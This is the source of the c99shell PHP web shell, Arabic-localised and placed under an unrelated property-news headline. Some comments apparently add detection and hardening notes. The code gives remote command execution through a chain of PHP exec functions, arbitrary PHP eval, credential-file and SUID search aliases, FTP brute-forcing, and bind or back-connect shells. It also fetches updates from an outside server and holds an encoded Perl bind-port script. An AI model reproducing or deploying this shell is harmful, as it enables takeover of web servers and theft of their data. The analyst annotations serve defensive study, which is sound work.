
Simplified planning edges closer

Property Week via Google

<?php

/*

******************************************************************************************************

*

*                                        c99shell.php *                                                        Freeware license.

*                                                              *  c99shell - ôàéë-ىهيهنوهً ÷هًهç www-لًîَçهً, "çàٍî÷هيûé" نëے âçëîىà.

*  آû ىîوهٍه لهٌïëàٍيî ٌêà÷àٍü ïîٌëهني‏‏ âهًٌè‏ يà نîىàّيهé ًٌٍàيè÷êه ïًîنَêٍà:

   

*

*  WEB: www.google.com

*  ICQ UIN #: 656555

*

*  خٌîلهييîٌٍè:

*  + َïًàâëهيèه ëîêàëüيûىè è َنàëهييûىè (ftp, samba *) ôàéëàىè/ïàïêàىè, ٌîًٍèًîâêà

*    çàêà÷èâàيèه ٌêà÷èâàيèه ôàéëîâ è ïàïîê

*    (ïًهنâîًèٍهëüيî َïàêîâûâàهٌٍے/ًàٌïàêîâûâàهٌٍے ÷هًهç tar *)

*    ïًîنâèيٍَûé ïîèٌê (âîçىîوهي âيًٍَè ôàéëîâ)

*    modify-time è access-time َ ôàéëîâ يه ىهيے‏ٌٍے ïًè ًهنàêٍèًîâàيèè (âûêë./âêë. ïàًàىهًٍîى $filestealth)

*  + ïًîنâèيٍَûé SQL-ىهيهنوهً يه ٌٍََïà‏ùèé phpmyadmin,

     ïًîٌىîًٍ/ٌîçنàيèه/ًهنàêٍèًîâàيèه ءؤ/ٍàلëèِ, ïًîٌىîًٍ ôàéëîâ ÷هًهç لًهّü â mysql

*  + َïًàâëهيèه ïًîِهٌٌàىè unix-ىàّèيû.

*  + َنîليîه (èيîمنà مًàôè÷هٌêîه) âûïîëيهيèه shell-êîىàين (ىيîمî àëèàٌîâ, ىîويî ًهنàêٍèًîâàٍü)

*  + âûïîëيهيèه ïًîèçâîëüيîمî PHP-êîنà

*  + êîنèًîâùèê نàييûُ ÷هًهç md5, unix-md5, sha1, crc32, base64

*  + لûًٌٍûé ëîêàëüيûé àيàëèç لهçîïàٌيîٌٍè خر

*  + لûًٌٍîه ftp-ٌêàيèًîâàيèه يà ٌâےçêè login;login èç /etc/passwd (îلû÷يî نàهٍ نîٌٍَï ê 1/100 àêêàَيٍîâ)

*    ïîًٌٍàيè÷يûé âûâîن, ٌîًٍèًîâêà, مًَïïîâûه îïهًàِèè يàن ءؤ/ٍàلëèِàىè, َïًàâëهيèه ïًîِهٌٌàىè SQL)

*  + ٌêًèïٍ "ë‏لèٍ" include: àâٍîىàٍè÷هٌêè èùهٍ ïهًهىهييûه ٌ نهٌêًèïٍîًàىè è âٌٍàâëےهٍ èُ â ٌٌûëêè (îïِèàëüيî)

     ٍàêوه ىîويî èçىهيèٍü $surl (لàçîâàے ٌٌûëêà) êàê ÷هًهç êîيôèمًَàِè‏ (ïًèيَنèٍهëüيî) ٍàê è ÷هًهç cookie "c99sh_surl",

     èنهٍ àâٍî-çàïèٌü çيà÷هيèے $set_surl â cookie "set_surl"

*  + âîçىîويîٌٍü "çàلèينèٍü" /bin/bash يà îïًهنهëهييûé ïîًٍ ٌ ïًîèçâîëüيûى ïàًîëهى,

*    èëè ٌنهëàٍü back connect (ïًîèçâîنèٌٍے ٍهٌٍèًîâàيèه ٌîهنهيهيèے, è âûâîنےٌٍے ïàًàىهًٍû نëے çàïٌَêà NetCat).

*  + âîçىîويîٌٍü لûًٌٍîمî ٌàىî-َنàëهيèے ٌêًèïٍà

*  + àâٍîىàٍèçèًîâàيàے îٍïًàâêà ٌîîلùهيèé î يهنîًàلîٍêàُ è ïîوهëàيèé àâٍîًَ (÷هًهç mail())


*  * - ٌَïهُ ïîëيîٌٍü‏ çàâèٌèٍ îٍ êîيôèمًَàِèè PHP

*

*        آ îلùهى يَويî َâèنهٍü âٌ¸ ‎ٍî!

*

*   خوèنàهىûه èçىهيهيèے:

*  ~ ذàçâèٍèه sql-ىهيهنوهًà

*  ~ ؤîلàâëهيèه يهنîٌٍà‏ùèُ ًàٌّèًهيèé ôàéëîâ

*

*  ~-~ دèّèٍه îلî âٌهُ يàéنهيûُ يهنîًàلîٍêàُ, وهëàهىûُ èçىهيهيèےُ è نîًàلîٍêàُ (نàوه î ٌàىûُ يهçيà÷èٍهëüيûُ!)

       â ICQ UIN #656555 ëèلî ÷هًهç ًàçنهë "feedback", لَنٍَ ًàٌٌىîًٍهيû âٌه ïًهنëîوهيèے è ïîوهëàيèے.

*

*  Last modify: 3.07.2005

*

*  © Golden-z3ro. ©oded by Golden-z3ro

*

******************************************************************************************************

*/

// Start-up: timing helper, error/abort settings, and import of request data into global variables.

// Current Unix time as a float (seconds plus microseconds); defined only if no such function exists yet.
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}

// 5 = E_ERROR | E_PARSE, so warnings and notices are not reported.
error_reporting(5);

// Keep the script running after the HTTP client disconnects.
@ignore_user_abort(true);

// Legacy magic-quotes call (the function was removed in PHP 7.0); it dates this sample to PHP 4/5-era hosts.
@set_magic_quotes_runtime(0);

// True when PHP_OS starts with "win" (case-insensitive).
$win = strtolower(substr(PHP_OS, 0, 3)) == "win";

define("starttime",getmicrotime());

// When magic quotes are active, recursively strip the added slashes from everything in $GLOBALS (skipping the self-reference).
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}

// $_REQUEST is rebuilt from cookies, then GET, then POST (later sources win on a key clash).
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);

// Every request key becomes a global variable unless a variable of that name is already set.
// For analysts: names such as $act or $selfwrite used further down are therefore request parameters,
// so they can appear as query-string or cookie names in web-server logs.
foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}


$shver = ""; //Current version

//CONFIGURATION AND SETTINGS

if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}

elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}

else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL

}


$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.


if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}

if (empty($surl))

{

 $surl = "?".$includestr; //Self url

}

$surl = htmlspecialchars($surl);


$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.


// Authentication settings.
// In this copy $login is empty, so the `if (!empty($login))` HTTP Basic-auth check later in the file is skipped.

$login = ""; //login

//DON'T FORGET THE PASSWORD!

$pass = ""; //password

$md5_pass = ""; //MD5 hex digest of the password; if empty, md5($pass) is computed at check time


// When the SAPI reports a CGI gateway, the login is cleared, which switches the auth check off.
if (stristr($_SERVER["GATEWAY_INTERFACE"],"cgi")) {$login = "";} // If CGI then turn off auth.


// "*" matches any client address or host name, i.e. no source restriction in this copy.
$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")

$login_txt = "Restricted area"; //http-auth message.

// Body sent with the 401 response; the fixed text "c99shell v." is a usable content signature for response inspection.
$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";


$gzipencode = true; //Encode with gzip?


$autoupdate = false; //Automatic updating?


$updatenow = false; //If true, update now (this variable will be false)


$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server


$filestealth = true; //if true, don't change modify&access-time


$donated_html = "<center><b>;

تم تعريب الشل من طرف منظمة الحرباء | comix <span

class=SpellE>;</b></center>";

                /* If you publish free shell and you wish

                add link to your site or any other information,

                put here your html. */

$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.


$curdir = "./"; //start folder

//$curdir = getenv("DOCUMENT_ROOT");

$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)

$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)


$log_email = "user@host.tld"; //Default e-mail for sending logs


$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending

$sort_save = true; //If true then save sorting-type.


// Registered file-types.

//  array(

//   "{action1}"=>array("ext1","ext2","ext3",...),

//   "{action2}"=>array("ext4","ext5","ext6",...),

//   ...

//  )

$ftypes  = array(

 "html"=>array("html","htm","shtml"),

 "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),

 "exe"=>array("sh","install","bat","cmd"),

 "ini"=>array("ini","inf"),

 "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),

 "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),

 "sdb"=>array("sdb"),

 "phpsess"=>array("sess"),

 "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")

);


// Registered executable file-types.

//  array(

//   string "command{i}"=>array("ext1","ext2","ext3",...),

//   ...

//  )

//   {command}: %f% = filename

$exeftypes  = array(

 getenv("PHPRC")." %f%"=>array("php","php3","php4"),

);


/* Highlighted files.

  array(

   i=>array({regexp},{type},{opentag},{closetag},{break})

   ...

  )

  string {regexp} - regular exp.

  int {type}:

        0 - files and folders (as default),

        1 - files only, 2 - folders only

  string {opentag} - open html-tag, e.g. "<b>" (default)

  string {closetag} - close html-tag, e.g. "</b>" (default)

  bool {break} - if true and found match then break

*/

$regxp_highlight  = array(

  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example

  array("config.php",1) // example

);


$safemode_diskettes = array("a"); // This variable for disabling diskett-errors.

                                                                         // array (i=>{letter} ...); string {letter} - letter of a drive

//$safemode_diskettes = range("a","z");

$hexdump_lines = 8;        // lines in hex preview file

$hexdump_rows = 24;        // 16, 24 or 32 bytes in one line


$nixpwdperpage = 100; // Get first N lines from /etc/passwd


// Defaults for the bind-shell / back-connect feature.
// Detection note: a listener or outbound connection on TCP 31373 owned by the web-server account
// is worth investigating; these are only defaults, so other ports do not rule the feature out.
$bindport_pass = "c99";          // default password for binding

$bindport_port = "31373"; // default port for binding

$bc_port = "31373"; // default port for back-connect


// Command-aliases

if (!$win)

{

 $cmdaliases = array(

  array("-----------------------------------------------------------", "ls -la"),

  array("العثور على جميع الملفات SUID", "find / -type f -perm -04000 -ls"),

  array("العثور على ملفات SUID في الدليل الحالي", "find . -type f -perm -04000 -ls"),

  array("العثور على جميع الملفات SGID", "find / -type f -perm -02000 -ls"),

  array("العثور على ملفات SGID في الدليل الحالي", "find . -type f -perm -02000 -ls"),

  array("العثور على ملفات config.inc.php", "find / -type f -name config.inc.php"),

  array("find config* files", "find / -type f -name \"config*\""),

  array("find config* files in current dir", "find . -type f -name \"config*\""),

  array("العثور على كل المجلدات والملفات للكتابة", "find / -perm -2 -ls"),

  array("العثور على جميع المجلدات والملفات للكتابة في دير الحالي", "find . -perm -2 -ls"),

  array("العثور على جميع الملفات service.pwd", "find / -type f -name service.pwd"),

  array("find service.pwd files in current dir", "find . -type f -name service.pwd"),

  array("find all .htpasswd files", "find / -type f -name .htpasswd"),

  array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"),

  array("find all .bash_history files", "find / -type f -name .bash_history"),

  array("العثور على جميع الملفات .bash_history", "find . -type f -name .bash_history"),

  array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),

  array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),

  array("list file attributes on a Linux second extended file system", "lsattr -va"),

  array("show opened ports", "netstat -an | grep -i listen")

 );

}

else

{

 $cmdaliases = array(

  array("-----------------------------------------------------------", "dir"),

  array("إظهار المنافذ المفتوحة", "netstat -an")

 );

}


$sess_cookie = "c99shvars"; // Cookie-variable name


$usefsbuff = true; //Buffer-function

$copy_unset = false; //Remove copied files from buffer after pasting


//Quick launch

$quicklaunch = array(

 array("<img src=\"".$surl."act=img&img=home\" alt=\"الصفحة الرئيسة\" height=\"20\" width=\"20\" border=\"0\">",$surl),

 array("<img src=\"".$surl."act=img&img=back\" alt=\"رجوع\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"),

 array("<img src=\"".$surl."act=img&img=forward\" alt=\"تقدم\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"),

 array("<img src=\"".$surl."act=img&img=up\" alt=\"أعلى\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),

 array("<img src=\"".$surl."act=img&img=refresh\" alt=\"تحديث\" height=\"20\" width=\"17\" border=\"0\">",""),

 array("<img src=\"".$surl."act=img&img=search\" alt=\"بحث\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"),

 array("<img src=\"".$surl."act=img&img=buffer\" alt=\"الحاجز\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"),

 array("<b>المشفر</b>",$surl."act=encoder&d=%d"),

 array("<b>إتصال عكسي</b>",$surl."act=bind&d=%d"),

 array("<b>Proc.</b>",$surl."act=processes&d=%d"),

 array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"),

 array("<b>الحماية</b>",$surl."act=security&d=%d"),

 array("<b>SQL</b>",$surl."act=sql&d=%d"),

 array("<b>PHP-code</b>",$surl."act=eval&d=%d"),

 array("<b>تحديث النسخة</b>",$surl."act=update&d=%d"),

 array("<b>ملاحضات</b>",$surl."act=feedback&d=%d"),

 array("<b>حدف الشل</b>",$surl."act=selfremove"),

 array("<b>خروج</b>","#\" onclick=\"if (confirm('هل أنت متأكد من تسجيل الخروج')) window.close()")

);


//Highlight-code colors

$highlight_background = "#c0c0c0";

$highlight_bg = "#FFFFFF";

$highlight_comment = "#6A6A6A";

$highlight_default = "#0000BB";

$highlight_html = "#1300FF";

$highlight_keyword = "#007700";

$highlight_string = "#000000";


// $f is taken directly from the request ("@" hides the notice when it is absent).
@$f = $_REQUEST["f"];

// extract() without flags uses EXTR_OVERWRITE: keys of the request array "c99shcook" replace
// same-named variables that are already set, including the configuration assigned above.
// For incident response, do not assume the configured login or host list limited who could use this file.
@extract($_REQUEST["c99shcook"]);


//END CONFIGURATION



//                                 \/        Next code isn't for editing        \/

// Access gate: execution-time limit, source-host check, then optional HTTP Basic authentication.
@set_time_limit($timelimit);

$tmp = array();

// Each allow-list mask is regex-quoted, then the quoted "*" is turned back into ".*" so it acts as a wildcard.
foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}

$s = "!^(".implode("|",$tmp).")$!i";

// The request is refused only when neither REMOTE_ADDR nor its reverse-DNS name matches the allow-list.
// The refusal text ("c99shell</a>: Access Denied") is a fixed string that response inspection can match on.
if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}

// Basic auth is enforced only when a login name is configured.
if (!empty($login))

{

 if(empty($md5_pass)) {$md5_pass = md5($pass);}

 // Credentials are compared with loose "!=" against the login and an unsalted MD5 digest.
 if (($_SERVER["PHP_AUTH_USER"] != $login ) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))

 {

  if ($login_txt === "") {$login_txt = "";}

  // ereg_replace() was removed in PHP 7.0; this branch only runs when $login_txt is empty but not "".
  elseif (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}

  // The realm always begins with "c99shell ", which makes the 401 challenge a network-level indicator.
  header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\"");

  header("HTTP/1.0 401 Unauthorized");

  exit($accessdeniedmess);

 }

}

if ($act != "img")

{

// Remember the directory the script started in, then switch to the configured start folder.
$lastdir = realpath(".");

chdir($curdir);

// $selfwrite arrives via the request-to-globals import; either flag makes the script call its updater and stop.
if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}

// Session state (the copy/cut file buffers) lives in a client-side cookie holding a PHP-serialized array.
// Detection note: where cookies are logged, a cookie named by $sess_cookie ("c99shvars" in the
// configuration above) carrying a serialized array is an indicator of this tool.
// unserialize() is applied to the cookie value without any integrity check.
$sess_data = unserialize($_COOKIE["$sess_cookie"]);

// Anything that does not decode to the expected array shape is replaced by empty buffers.
if (!is_array($sess_data)) {$sess_data = array();}

if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}

if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}


if (!function_exists("c99_buff_prepare"))
{
/**
 * Normalises the global copy/cut path buffers in $sess_data.
 *
 * Each path is resolved with realpath() and its backslashes are replaced by the
 * platform separator; both lists are then de-duplicated and sorted. Finally,
 * entries found at the same index in both lists are dropped from one of them:
 * from "copy" unless the current action ($act) is "copy", otherwise from "cut".
 */
function c99_buff_prepare()
{
 global $sess_data;
 global $act;

 foreach (array("copy","cut") as $list)
 {
  foreach ($sess_data[$list] as $idx=>$path)
  {
   $sess_data[$list][$idx] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($path));
  }
 }
 foreach (array("copy","cut") as $list) {$sess_data[$list] = array_unique($sess_data[$list]);}
 foreach (array("copy","cut") as $list) {sort($sess_data[$list]);}

 // The list matching the current action wins; the other list loses same-index duplicates.
 if ($act != "copy") {$winner = "cut"; $loser = "copy";}
 else {$winner = "copy"; $loser = "cut";}

 foreach ($sess_data[$winner] as $idx=>$path)
 {
  if ($sess_data[$loser][$idx] == $path) {unset($sess_data[$loser][$idx]);}
 }
}
}

c99_buff_prepare();

if (!function_exists("c99_sess_put"))
{
/**
 * Replaces the global session buffer with $data and stores it client-side.
 *
 * The array is written with serialize() into the cookie named by the global
 * $sess_cookie; no signature or encryption is applied to the value.
 */
function c99_sess_put($data)
{
 global $sess_cookie, $sess_data;

 c99_buff_prepare();
 $sess_data = $data;
 setcookie($sess_cookie,serialize($data));
}
}

// Take the "sort" and "sql_sort" settings from GET, then POST (POST wins when both are non-empty).
// The loop variable $v is a global and still holds "sql_sort" once the loop has finished.
foreach (array("sort","sql_sort") as $v)

{

 if (!empty($_GET[$v])) {$$v = $_GET[$v];}

 if (!empty($_POST[$v])) {$$v = $_POST[$v];}

}

// With $sort_save enabled the chosen values are persisted in cookies named "sort" and "sql_sort".
if ($sort_save)

{

 if (!empty($sort)) {setcookie("sort",$sort);}

 if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}

}

if (!function_exists("str2mini"))
{
/**
 * Abbreviates a string for display by keeping its head and tail.
 *
 * Strings no longer than $len bytes are returned unchanged. Longer ones keep
 * ceil($len/2) - 2 bytes from each end, joined by "...".
 */
function str2mini($content,$len)
{
 if (strlen($content) <= $len) {return $content;}

 $keep = ceil($len/2) - 2;
 $head = substr($content,0,$keep);
 $tail = substr($content,-$keep);
 return $head."...".$tail;
}
}

if (!function_exists("view_size"))
{
/**
 * Formats a byte count as a human-readable string.
 *
 * Returns false for non-numeric input. Values are scaled by powers of 1024 and
 * rounded to two decimals ("GB", "MB", "KB"); anything below 1024 is shown in "B".
 */
function view_size($size)
{
 if (!is_numeric($size)) {return false;}

 // Largest unit first so the first threshold reached decides the suffix.
 $units = array(
  array(1073741824," GB"),
  array(1048576," MB"),
  array(1024," KB")
 );
 foreach ($units as $unit)
 {
  if ($size >= $unit[0]) {return round($size/$unit[0]*100)/100 .$unit[1];}
 }
 return $size." B";
}
}

if (!function_exists("fs_copy_dir"))
{
/**
 * Recursively copies the contents of directory $d into the existing directory $t.
 *
 * Returns true when every entry was handled; returns the failing result as soon
 * as a copy() or mkdir() fails (the directory handle is not closed in that case).
 * The result of the recursive call for a sub-directory is not checked.
 */
function fs_copy_dir($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}

 $handle = opendir($d);
 while (($entry = readdir($handle)) !== false)
 {
  if (($entry == ".") or ($entry == "..")) {continue;}

  $from = $d.DIRECTORY_SEPARATOR.$entry;
  $to = $t.DIRECTORY_SEPARATOR.$entry;
  if (is_dir($from))
  {
   $ok = mkdir($to);
   fs_copy_dir($from,$to);
  }
  else {$ok = copy($from,$to);}

  if (!$ok) {return $ok;}
 }
 closedir($handle);
 return true;
}
}

if (!function_exists("fs_copy_obj"))
{
/**
 * Copies a file or a directory tree from $d to $t.
 *
 * Backslashes in both paths are replaced by the platform separator and the
 * parent directory of $t is created when missing. Directories are delegated to
 * fs_copy_dir(); plain files use copy(). Returns false when $d is neither.
 */
function fs_copy_obj($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);

 $parent = dirname($t);
 if (!is_dir($parent)) {mkdir(dirname($t));}

 if (is_dir($d))
 {
  // Both directory paths are passed on with a trailing separator.
  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  return fs_copy_dir($d,$t);
 }
 if (is_file($d)) {return copy($d,$t);}
 return false;
}
}

if (!function_exists("fs_move_dir"))
{
/**
 * Copies the entries of directory $d into $t, creating $t when it is missing.
 *
 * As written, nothing is deleted from $d, and a sub-directory that was created
 * and copied successfully makes the function return false. A failed file copy
 * also returns false; otherwise the result is true.
 */
function fs_move_dir($d,$t)
{
 $handle = opendir($d);
 if (!is_dir($t)) {mkdir($t);}

 while (($entry = readdir($handle)) !== false)
 {
  if (($entry == ".") or ($entry == "..")) {continue;}

  $from = $d.DIRECTORY_SEPARATOR.$entry;
  $to = $t.DIRECTORY_SEPARATOR.$entry;
  $ok = true;
  if (is_dir($from))
  {
   if (mkdir($to) and fs_copy_dir($from,$to)) {$ok = false;}
  }
  else {$ok = copy($from,$to);}

  if (!$ok) {return $ok;}
 }
 closedir($handle);
 return true;
}
}

if (!function_exists("fs_move_obj"))
{
/**
 * Moves a file or directory from $d to $t.
 *
 * Directories are handed to fs_move_dir() with trailing separators added.
 * A file is copied and then unlinked; if the copy fails the (partial) target is
 * unlinked and false is returned. Returns false when $d is neither file nor dir.
 */
function fs_move_obj($d,$t)
{
 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
 $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);

 if (is_dir($d))
 {
  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  return fs_move_dir($d,$t);
 }
 if (!is_file($d)) {return false;}

 if (copy($d,$t)) {return unlink($d);}
 unlink($t);
 return false;
}
}

if (!function_exists("fs_rmdir"))
{
/**
 * Recursively deletes directory $d and everything below it.
 *
 * $d is expected to end with a directory separator because entry names are
 * appended to it directly. Returns true when $d no longer exists afterwards.
 */
function fs_rmdir($d)
{
 $handle = opendir($d);
 while (($entry = readdir($handle)) !== false)
 {
  if (($entry == ".") or ($entry == "..")) {continue;}

  $path = $d.$entry;
  if (is_dir($path))
  {
   fs_rmdir($path.DIRECTORY_SEPARATOR);
   rmdir($path);
  }
  else {unlink($path);}
 }
 closedir($handle);
 rmdir($d);
 return !is_dir($d);
}
}

if (!function_exists("fs_rmobj"))
{
/**
 * Deletes a file, or a directory tree via fs_rmdir().
 *
 * Backslashes are replaced by the platform separator first. Returns the result
 * of the delete call, or false when $o is neither a file nor a directory.
 */
function fs_rmobj($o)
{
 $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);

 if (is_dir($o))
 {
  // fs_rmdir() appends entry names directly, so make sure the path ends with a separator.
  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  return fs_rmdir($o);
 }
 if (is_file($o)) {return unlink($o);}
 return false;
}
}

if (!function_exists("myshellexec"))

{

/**
 * Runs $cmd as an operating-system command and returns its output as a string.
 *
 * The function tries several PHP process-execution primitives in turn and uses
 * the first one that works: exec(), the backtick operator, system(), passthru(),
 * then popen(). An empty $cmd returns "".
 *
 * Hardening note: because of this fallback chain, blocking only one of these
 * functions in php.ini `disable_functions` does not stop command execution; the
 * whole family (including shell_exec, which the backtick operator maps to) has
 * to be covered. Child processes spawned by the web-server/PHP account are the
 * host-level signal to monitor for.
 */
function myshellexec($cmd)

{

 $result = "";

 if (!empty($cmd))

 {

  // 1) exec(): output lines are collected into an array and re-joined with "\n".
  if (is_callable("exec")) {exec($cmd,$result); $result = join("\n",$result);}

  // 2) backtick operator; accepted unless it yields false.
  elseif (($result = `$cmd`) !== false) {}

  // 3) system() / 4) passthru(): both print directly, so the current output buffer is saved,
  //    cleared, used to capture the command output, cleared again and then re-emitted.
  elseif (is_callable("system")) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

  elseif (is_callable("passthru")) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}

  // 5) popen(): read the pipe in 1024-byte chunks until EOF.
  elseif (is_resource($fp = popen($cmd,"r")))

  {

   $result = "";

   while(!feof($fp)) {$result .= fread($fp,1024);}

   pclose($fp);

  }

 }

 return $result;

}

}

if (!function_exists("tabsort"))
{
/**
 * Comparison callback: orders two rows by natural string order of one column.
 *
 * The column key is read from the global variable $v, not from a parameter.
 */
function tabsort($a,$b)
{
 global $v;

 $left = $a[$v];
 $right = $b[$v];
 return strnatcmp($left,$right);
}
}

if (!function_exists("view_perms"))
{
/**
 * Renders a numeric file mode as an ls-style string such as "-rwxr-xr-x".
 *
 * The first character is the file type (s, d, l, -, b, c, p or ? when no mask
 * matches). The set-uid, set-gid and sticky bits replace the respective execute
 * flag with s/S or t/T (lower case when execute is also set).
 */
function view_perms($mode)
{
 // Tested in this order; the first mask fully contained in $mode decides the type.
 $kinds = array(
  0xC000=>"s",
  0x4000=>"d",
  0xA000=>"l",
  0x8000=>"-",
  0x6000=>"b",
  0x2000=>"c",
  0x1000=>"p"
 );
 $text = "?";
 foreach ($kinds as $mask=>$letter)
 {
  if (($mode & $mask) === $mask) {$text = $letter; break;}
 }

 // read mask, write mask, execute mask, special-bit mask, letter with / without execute
 $classes = array(
  array(00400,00200,00100,0x800,"s","S"),
  array(00040,00020,00010,0x400,"s","S"),
  array(00004,00002,00001,0x200,"t","T")
 );
 foreach ($classes as $class)
 {
  list($r,$w,$x,$special,$withExec,$withoutExec) = $class;
  $exec = ($mode & $x)?"x":"-";
  if ($mode & $special) {$exec = ($exec == "x")?$withExec:$withoutExec;}
  $text .= (($mode & $r)?"r":"-").(($mode & $w)?"w":"-").$exec;
 }
 return $text;
}
}

if (!function_exists("parse_perms"))
{
/**
 * Splits a numeric file mode into a type letter and boolean permission flags.
 *
 * Returns array("t"=>type, "o"=>owner, "g"=>group, "w"=>world), where each of
 * the last three is array("r"=>bool, "w"=>bool, "x"=>bool). Special bits
 * (set-uid, set-gid, sticky) are not reported.
 */
function parse_perms($mode)
{
 // Tested in this order; the first mask fully contained in $mode decides the type.
 $kinds = array(
  0xC000=>"s",
  0x4000=>"d",
  0xA000=>"l",
  0x8000=>"-",
  0x6000=>"b",
  0x2000=>"c",
  0x1000=>"p"
 );
 $kind = "?";
 foreach ($kinds as $mask=>$letter)
 {
  if (($mode & $mask) === $mask) {$kind = $letter; break;}
 }

 $masks = array(
  "o"=>array(00400,00200,00100),
  "g"=>array(00040,00020,00010),
  "w"=>array(00004,00002,00001)
 );
 $parsed = array("t"=>$kind);
 foreach ($masks as $who=>$bits)
 {
  $parsed[$who] = array(
   "r"=>($mode & $bits[0]) > 0,
   "w"=>($mode & $bits[1]) > 0,
   "x"=>($mode & $bits[2]) > 0
  );
 }
 return $parsed;
}
}

if (!function_exists("parsesort"))
{
/**
 * Parses a sort specifier such as "0a" or "3d".
 *
 * Returns array(column, direction): the column is intval() of the specifier and
 * the direction is "d" only when the last character is "d", otherwise "a".
 */
function parsesort($sort)
{
 $column = intval($sort);
 $direction = (substr($sort,-1) != "d")?"a":"d";
 return array($column,$direction);
}
}

if (!function_exists("view_perms_color"))
{
/**
 * Returns the permission string of path $o wrapped in a coloured <font> tag.
 *
 * red = not readable, white = readable but not writable, green = readable and
 * writable, all as seen by the account PHP runs under.
 */
function view_perms_color($o)
{
 if (!is_readable($o)) {$color = "red";}
 elseif (!is_writable($o)) {$color = "white";}
 else {$color = "green";}

 return "<font color=".$color.">".view_perms(fileperms($o))."</font>";
}
}

if (!function_exists("c99getsource"))

{

function c99getsource($fn)

{

 if ($fn == "c99sh_bindport.pl") {return base64_decode(

"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW".

"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI".

"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS".

